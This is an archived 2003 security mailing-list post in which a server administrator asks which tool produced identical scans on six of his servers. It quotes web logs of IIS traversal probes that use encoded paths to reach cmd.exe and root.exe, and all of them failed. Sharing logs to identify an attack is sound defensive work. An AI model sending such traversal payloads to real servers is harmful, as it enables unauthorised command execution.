Anyone know this tool?

From: Danny (danny_at_eboundary.com)
Date: 07/29/03

  • Next message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
    Date: Mon, 28 Jul 2003 23:24:16 -0400
    To: incidents@securityfocus.com
    
    

    Does anyone happen to know what tool this is? I've seen the exact same
    scans on 6 of our servers on completely different networks. All the
    scans have been from different source IP's and all the servers were hit
    within a space of a few hours.

    Curiosity is getting the better of me since i've never seen this exact
    pattern before :)

    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
    winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic
    boundaries?
    AIM: eBoundaryTch | ICQ: 3090141

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------


  • Next message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"

    Relevant Pages

    • Re: TCP options order changed in FreeBSD 7, incompatible with some routers
      ... Exact same problem that i'm having. ... downgrading one of our servers back to 6.3 stable allowed the same clients ... For the control user (who can connect via TCP just fine), ... I get a hunch that the users with the problem have a router that ...
      (freebsd-net)
    • Re: Anyone know this tool?
      ... > Network Systems Engineer ... I've seen the exact same ... > scans on 6 of our servers on completely different networks. ...
      (Incidents)
    • Re: broken fxp driver in 4.x ...
      ... > fxp driver is doing the exact same thing ... ... > servers do a nice quick 'ifconfig alias' for an IP, ...
      (freebsd-stable)
    • Re: BEN MAKIE = LOGOS. Re: Darwin carries within itself its own destruction
      ... > Earthlink's servers in the area that I called. ... So the chances of two people pulling the exact ... > "Voice or no voice, the people can always be brought to the bidding of ...
      (talk.origins)
    • Re: shared folders
      ... (state the exact value used when the command fails) ... the script I verify that they are those that I want. ... My problem is that my script works ok in the most servers but in 2 ...
      (microsoft.public.windows.server.general)

  • Quantcast